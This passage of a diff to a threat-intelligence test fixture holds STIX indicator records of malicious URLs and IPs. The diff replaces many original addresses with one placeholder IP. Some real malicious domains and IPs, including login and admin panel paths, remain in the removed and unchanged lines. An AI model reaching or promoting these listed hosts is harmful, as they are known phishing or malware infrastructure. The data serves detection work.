"/~giftioz/.azma/panel/admin.php", "extension": "php", - "original": "http://107.175.150.73/~giftioz/.azma/panel/admin.php", + "original": "http://89.160.20.156/~giftioz/.azma/panel/admin.php", "scheme": "http", - "domain": "107.175.150.73", - "full": "http://107.175.150.73/~giftioz/.azma/panel/admin.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/~giftioz/.azma/panel/admin.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385375699Z", - "original": "{\"created\":\"2020-01-24T02:59:50.255Z\",\"description\":\"TS ID: 55250078009; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--1be74977-5aa6-4175-99dd-32b54863a06b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-25\"],\"modified\":\"2020-01-24T02:59:50.255Z\",\"name\":\"mal_url: http://107.175.150.73/~giftioz/.azma/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://107.175.150.73/~giftioz/.azma/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:50.255Z\"}", + "ingested": "2021-12-13T08:38:40.022966700Z", + "original": "{\"created\":\"2020-01-24T02:59:50.255Z\",\"description\":\"TS ID: 55250078009; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--1be74977-5aa6-4175-99dd-32b54863a06b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-25\"],\"modified\":\"2020-01-24T02:59:50.255Z\",\"name\":\"mal_url: http://89.160.20.156/~giftioz/.azma/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/~giftioz/.azma/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:50.255Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3500,7 +3500,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://5.188.60.52/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55250078023; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", "modified": "2020-01-24T02:59:52.536Z", "valid_from": "2020-01-24T02:59:52.536Z", @@ -3524,16 +3524,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://5.188.60.52/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "5.188.60.52", - "full": "http://5.188.60.52/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385380168Z", - "original": "{\"created\":\"2020-01-24T02:59:52.536Z\",\"description\":\"TS ID: 55250078023; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--eacc25ce-584c-4b40-98ab-7935dabd5cb1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-78\"],\"modified\":\"2020-01-24T02:59:52.536Z\",\"name\":\"mal_url: http://5.188.60.52/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://5.188.60.52/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:52.536Z\"}", + "ingested": "2021-12-13T08:38:40.022970800Z", + "original": "{\"created\":\"2020-01-24T02:59:52.536Z\",\"description\":\"TS ID: 55250078023; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--eacc25ce-584c-4b40-98ab-7935dabd5cb1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-78\"],\"modified\":\"2020-01-24T02:59:52.536Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:52.536Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3583,7 +3583,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385384516Z", + "ingested": "2021-12-13T08:38:40.022975Z", "original": "{\"created\":\"2020-01-24T02:59:54.784Z\",\"description\":\"TS ID: 55250078025; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--504f4011-eaea-4921-aad5-f102bef7c798\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-01-24T02:59:54.784Z\",\"name\":\"mal_url: http://trotdeiman.ga/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://trotdeiman.ga/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:54.784Z\"}", "category": "threat", "type": "indicator", @@ -3602,7 +3602,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 217.8.117.8", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55250078014; iType: mal_ip; State: active; Source: CyberCrime", "modified": "2020-01-24T02:59:54.815Z", "valid_from": "2020-01-24T02:59:54.815Z", @@ -3624,12 +3624,12 @@ "first_seen": "2020-01-24T02:59:54.815Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "217.8.117.8" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385389866Z", - "original": "{\"created\":\"2020-01-24T02:59:54.815Z\",\"description\":\"TS ID: 55250078014; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--e3ffb953-6c59-461a-8242-0d26c2b5c358\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-24T02:59:54.815Z\",\"name\":\"mal_ip: 217.8.117.8\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '217.8.117.8']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:54.815Z\"}", + "ingested": "2021-12-13T08:38:40.022978700Z", + "original": "{\"created\":\"2020-01-24T02:59:54.815Z\",\"description\":\"TS ID: 55250078014; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--e3ffb953-6c59-461a-8242-0d26c2b5c358\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-24T02:59:54.815Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:54.815Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3647,7 +3647,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 104.223.170.113", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55250078036; iType: mal_ip; State: active; Org: Global Frag Networks; Source: CyberCrime", "modified": "2020-01-24T03:00:01.726Z", "valid_from": "2020-01-24T03:00:01.726Z", @@ -3669,12 +3669,12 @@ "first_seen": "2020-01-24T03:00:01.726Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "104.223.170.113" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385394264Z", - "original": "{\"created\":\"2020-01-24T03:00:01.726Z\",\"description\":\"TS ID: 55250078036; iType: mal_ip; State: active; Org: Global Frag Networks; Source: CyberCrime\",\"id\":\"indicator--3a47ad46-930d-4ced-b0e7-dc9d0776153e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-24T03:00:01.726Z\",\"name\":\"mal_ip: 104.223.170.113\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '104.223.170.113']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:00:01.726Z\"}", + "ingested": "2021-12-13T08:38:40.022983900Z", + "original": "{\"created\":\"2020-01-24T03:00:01.726Z\",\"description\":\"TS ID: 55250078036; iType: mal_ip; State: active; Org: Global Frag Networks; Source: CyberCrime\",\"id\":\"indicator--3a47ad46-930d-4ced-b0e7-dc9d0776153e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-24T03:00:01.726Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:00:01.726Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3725,7 +3725,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385398512Z", + "ingested": "2021-12-13T08:38:40.022991700Z", "original": "{\"created\":\"2020-01-24T03:00:01.762Z\",\"description\":\"TS ID: 55250078011; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--0e10924c-745c-4a58-8e27-ab3a6bacd666\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-58\"],\"modified\":\"2020-01-24T03:00:01.762Z\",\"name\":\"mal_url: http://tavim.org/includes/firmino/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tavim.org/includes/firmino/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:00:01.762Z\"}", "category": "threat", "type": "indicator", @@ -3776,7 +3776,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385403081Z", + "ingested": "2021-12-13T08:38:40.022999400Z", "original": "{\"created\":\"2020-01-24T03:00:10.928Z\",\"description\":\"TS ID: 55250078015; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--c3fb816a-cc3b-4442-be4d-d62113ae5168\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-01-24T03:00:10.928Z\",\"name\":\"mal_url: http://onlinesecuritycenter.xyz/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://onlinesecuritycenter.xyz/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:00:10.928Z\"}", "category": "threat", "type": "indicator", @@ -3828,7 +3828,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385407329Z", + "ingested": "2021-12-13T08:38:40.023006700Z", "original": "{\"created\":\"2020-01-24T03:00:20.166Z\",\"description\":\"TS ID: 55250078029; iType: mal_url; State: active; Org: IT House, Ltd; Source: CyberCrime\",\"id\":\"indicator--9159e46d-f3a4-464b-ac68-8beaf87e1a8f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-24T03:00:20.166Z\",\"name\":\"mal_url: http://oaa-my.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://oaa-my.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:00:20.166Z\"}", "category": "threat", "type": "indicator", @@ -3879,7 +3879,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385411527Z", + "ingested": "2021-12-13T08:38:40.023014300Z", "original": "{\"created\":\"2020-01-24T03:00:24.048Z\",\"description\":\"TS ID: 55250078016; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--fefa8e76-ae0f-41ab-84e7-ea43ab055573\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-24T03:00:24.048Z\",\"name\":\"mal_url: http://jumbajumbadun.fun/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://jumbajumbadun.fun/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:00:24.048Z\"}", "category": "threat", "type": "indicator", @@ -3931,7 +3931,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385416205Z", + "ingested": "2021-12-13T08:38:40.023021700Z", "original": "{\"created\":\"2020-01-24T03:00:55.816Z\",\"description\":\"TS ID: 55250078024; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--6a76fa89-4d5f-40d0-9b03-671bdb2d5b4b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-58\"],\"modified\":\"2020-01-24T03:00:55.816Z\",\"name\":\"mal_url: http://tavim.org/includes/salah/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tavim.org/includes/salah/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:00:55.816Z\"}", "category": "threat", "type": "indicator", @@ -3982,7 +3982,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385420263Z", + "ingested": "2021-12-13T08:38:40.023026900Z", "original": "{\"created\":\"2020-01-24T03:01:10.501Z\",\"description\":\"TS ID: 55250078022; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--21055dfd-d0cb-42ec-93bd-ffaeadd11d80\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-80\"],\"modified\":\"2020-01-24T03:01:10.501Z\",\"name\":\"mal_url: http://l0c23205.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://l0c23205.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:01:10.501Z\"}", "category": "threat", "type": "indicator", @@ -4033,7 +4033,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385424691Z", + "ingested": "2021-12-13T08:38:40.023032900Z", "original": "{\"created\":\"2020-01-24T03:01:10.518Z\",\"description\":\"TS ID: 55250078021; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--7471a595-e8b0-4c41-be4c-0a3e55675630\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-24T03:01:10.518Z\",\"name\":\"mal_url: http://l535e9e5.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://l535e9e5.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:01:10.518Z\"}", "category": "threat", "type": "indicator", @@ -4052,7 +4052,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 217.8.117.47", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55250078007; iType: mal_ip; State: active; Source: CyberCrime", "modified": "2020-01-24T03:01:14.843Z", "valid_from": "2020-01-24T03:01:14.843Z", @@ -4074,12 +4074,12 @@ "first_seen": "2020-01-24T03:01:14.843Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "217.8.117.47" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385428949Z", - "original": "{\"created\":\"2020-01-24T03:01:14.843Z\",\"description\":\"TS ID: 55250078007; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--ead1e7e5-fdb3-47c2-9476-aa82741c038e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-24T03:01:14.843Z\",\"name\":\"mal_ip: 217.8.117.47\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '217.8.117.47']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:01:14.843Z\"}", + "ingested": "2021-12-13T08:38:40.023040600Z", + "original": "{\"created\":\"2020-01-24T03:01:14.843Z\",\"description\":\"TS ID: 55250078007; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--ead1e7e5-fdb3-47c2-9476-aa82741c038e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-24T03:01:14.843Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:01:14.843Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4097,7 +4097,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://46.161.27.57/northon/", + "name": "mal_url: http://89.160.20.156/northon/", "description": "TS ID: 55253484365; iType: mal_url; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime", "modified": "2020-01-25T02:57:12.699Z", "valid_from": "2020-01-25T02:57:12.699Z", @@ -4121,16 +4121,16 @@ "provider": "CyberCrime", "url": { "path": "/northon/", - "original": "http://46.161.27.57/northon/", + "original": "http://89.160.20.156/northon/", "scheme": "http", - "domain": "46.161.27.57", - "full": "http://46.161.27.57/northon/" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/northon/" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385433548Z", - "original": "{\"created\":\"2020-01-25T02:57:12.699Z\",\"description\":\"TS ID: 55253484365; iType: mal_url; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime\",\"id\":\"indicator--b0aee6bf-32f4-4f65-8de6-f65e04e92b15\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-25T02:57:12.699Z\",\"name\":\"mal_url: http://46.161.27.57/northon/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://46.161.27.57/northon/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:12.699Z\"}", + "ingested": "2021-12-13T08:38:40.023048Z", + "original": "{\"created\":\"2020-01-25T02:57:12.699Z\",\"description\":\"TS ID: 55253484365; iType: mal_url; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime\",\"id\":\"indicator--b0aee6bf-32f4-4f65-8de6-f65e04e92b15\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-25T02:57:12.699Z\",\"name\":\"mal_url: http://89.160.20.156/northon/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/northon/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:12.699Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4148,7 +4148,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://104.168.99.170/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55253484350; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime", "modified": "2020-01-25T02:57:28.034Z", "valid_from": "2020-01-25T02:57:28.034Z", @@ -4172,16 +4172,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://104.168.99.170/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "104.168.99.170", - "full": "http://104.168.99.170/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385437836Z", - "original": "{\"created\":\"2020-01-25T02:57:28.034Z\",\"description\":\"TS ID: 55253484350; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--54afbceb-72f3-484e-aee4-904f77beeff6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-25T02:57:28.034Z\",\"name\":\"mal_url: http://104.168.99.170/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://104.168.99.170/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:28.034Z\"}", + "ingested": "2021-12-13T08:38:40.023054600Z", + "original": "{\"created\":\"2020-01-25T02:57:28.034Z\",\"description\":\"TS ID: 55253484350; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--54afbceb-72f3-484e-aee4-904f77beeff6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-25T02:57:28.034Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:28.034Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4232,7 +4232,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385442064Z", + "ingested": "2021-12-13T08:38:40.023058200Z", "original": "{\"created\":\"2020-01-25T02:57:38.187Z\",\"description\":\"TS ID: 55253484356; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--da030e10-af9f-462d-bda8-33abb223e950\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-01-25T02:57:38.187Z\",\"name\":\"mal_url: http://officelog.org/inc/js/jstree/scan/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://officelog.org/inc/js/jstree/scan/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:38.187Z\"}", "category": "threat", "type": "indicator", @@ -4283,7 +4283,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385446432Z", + "ingested": "2021-12-13T08:38:40.023062200Z", "original": "{\"created\":\"2020-01-25T02:57:38.214Z\",\"description\":\"TS ID: 55253484343; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--d38e051a-bc5b-4723-884a-65e017d98299\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-65\"],\"modified\":\"2020-01-25T02:57:38.214Z\",\"name\":\"mal_url: http://f0391587.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0391587.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:38.214Z\"}", "category": "threat", "type": "indicator", @@ -4302,7 +4302,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://46.161.27.57:8080/northon/", + "name": "mal_url: http://89.160.20.156:8080/northon/", "description": "TS ID: 55253484367; iType: mal_url; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime", "modified": "2020-01-25T02:57:47.281Z", "valid_from": "2020-01-25T02:57:47.281Z", @@ -4326,17 +4326,17 @@ "provider": "CyberCrime", "url": { "path": "/northon/", - "original": "http://46.161.27.57:8080/northon/", + "original": "http://89.160.20.156:8080/northon/", "scheme": "http", "port": 8080, - "domain": "46.161.27.57", - "full": "http://46.161.27.57:8080/northon/" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:8080/northon/" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385450790Z", - "original": "{\"created\":\"2020-01-25T02:57:47.281Z\",\"description\":\"TS ID: 55253484367; iType: mal_url; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime\",\"id\":\"indicator--46491826-6ba1-4217-a35e-1eb0081a9e6a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-25T02:57:47.281Z\",\"name\":\"mal_url: http://46.161.27.57:8080/northon/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://46.161.27.57:8080/northon/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:47.281Z\"}", + "ingested": "2021-12-13T08:38:40.023067600Z", + "original": "{\"created\":\"2020-01-25T02:57:47.281Z\",\"description\":\"TS ID: 55253484367; iType: mal_url; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime\",\"id\":\"indicator--46491826-6ba1-4217-a35e-1eb0081a9e6a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-25T02:57:47.281Z\",\"name\":\"mal_url: http://89.160.20.156:8080/northon/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156:8080/northon/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:47.281Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -4386,7 +4386,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385455619Z", + "ingested": "2021-12-13T08:38:40.023075200Z", "original": "{\"created\":\"2020-01-25T02:57:51.296Z\",\"description\":\"TS ID: 55253484342; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--b9715fd5-b89a-4859-b19f-55e052709227\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-01-25T02:57:51.296Z\",\"name\":\"mal_url: http://f0393086.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0393086.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:51.296Z\"}", "category": "threat", "type": "indicator", @@ -4438,7 +4438,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385460288Z", + "ingested": "2021-12-13T08:38:40.023079200Z", "original": "{\"created\":\"2020-01-25T02:57:56.007Z\",\"description\":\"TS ID: 55253484363; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--e3177515-f481-46c8-bad8-582ba0858ef3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-25T02:57:56.007Z\",\"name\":\"mal_url: http://insuncos.com/files1/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://insuncos.com/files1/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:56.007Z\"}", "category": "threat", "type": "indicator", @@ -4489,7 +4489,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385464566Z", + "ingested": "2021-12-13T08:38:40.023085300Z", "original": "{\"created\":\"2020-01-25T02:57:56.044Z\",\"description\":\"TS ID: 55253484339; iType: mal_url; State: active; Org: DDoS-GUARD GmbH; Source: CyberCrime\",\"id\":\"indicator--33cdeaeb-5201-4fbb-b9ae-9c23377e7533\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-01-25T02:57:56.044Z\",\"name\":\"mal_url: http://tg-h.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tg-h.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:56.044Z\"}", "category": "threat", "type": "indicator", @@ -4541,7 +4541,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385468975Z", + "ingested": "2021-12-13T08:38:40.023090500Z", "original": "{\"created\":\"2020-01-25T02:58:11.038Z\",\"description\":\"TS ID: 55253484351; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--2baaa5f0-c2f6-4bd1-b59d-3a75931da735\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-25T02:58:11.038Z\",\"name\":\"mal_url: http://wusetwo.xyz/public_html/file/five/inc/class/pCharts/info/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 